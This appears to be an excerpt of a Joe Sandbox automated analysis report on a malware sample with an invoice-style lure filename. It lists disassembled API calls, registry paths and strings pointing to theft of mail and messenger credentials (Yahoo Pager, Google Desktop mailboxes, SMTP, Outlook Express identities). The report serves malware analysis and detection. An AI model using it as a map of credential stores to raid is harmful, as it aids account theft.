                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 438689982-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                          • memset.MSVCRT ref: 0040330B
                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                          • strchr.MSVCRT ref: 0040335A
                                                                                                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                          • strlen.MSVCRT ref: 0040339C
                                                                                                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                          • String ID: Personalities
                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00444573
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: H
                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: winRead
                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4247780290-0
                                                                                                                          APIs
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                          • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi$_mbscpy
                                                                                                                          • String ID: smtp
                                                                                                                          • API String ID: 2625860049-60245459
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          • memset.MSVCRT ref: 00408258
                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                          Strings
                                                                                                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$EnumOpenmemset
                                                                                                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                          • API String ID: 2255314230-2212045309
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C28C
                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                          • String ID: S_@$l
                                                                                                                          • API String ID: 3436799508-4018740455
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy
                                                                                                                          • String ID: C^@$X$ini
                                                                                                                          • API String ID: 714388716-917056472
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                          • String ID: MS Sans Serif
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                          • String ID: edit
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                          • String ID: 3CD
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$memset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D2C2
                                                                                                                          • memset.MSVCRT ref: 0040D2D8
                                                                                                                          • memset.MSVCRT ref: 0040D2EA
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                          • memset.MSVCRT ref: 0040D319
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • too many SQL variables, xrefs: 0042C6FD
                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                          • memset.MSVCRT ref: 004026AD
                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                            • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                            • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                          • strlen.MSVCRT ref: 0040B60B
                                                                                                                          • atoi.MSVCRT(?,00000000,?,74DF0A60,?,00000000), ref: 0040B619
                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                          • _gmtime64.MSVCRT ref: 00411437
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                          • strftime.MSVCRT ref: 00411476
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen
                                                                                                                          • String ID: >$>$>
                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                          • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                          • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi
                                                                                                                          • String ID: C@$mail.identity
                                                                                                                          • API String ID: 1439213657-721921413
                                                                                                                          • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                          • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00406640
                                                                                                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                          • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                          • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset$memcmp
                                                                                                                          • String ID: Ul@
                                                                                                                          • API String ID: 270934217-715280498
                                                                                                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                          Strings
                                                                                                                          • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                          • String ID: recovered %d pages from %s
                                                                                                                          • API String ID: 985450955-1623757624
                                                                                                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _ultoasprintf
                                                                                                                          • String ID: %s %s %s
                                                                                                                          • API String ID: 432394123-3850900253
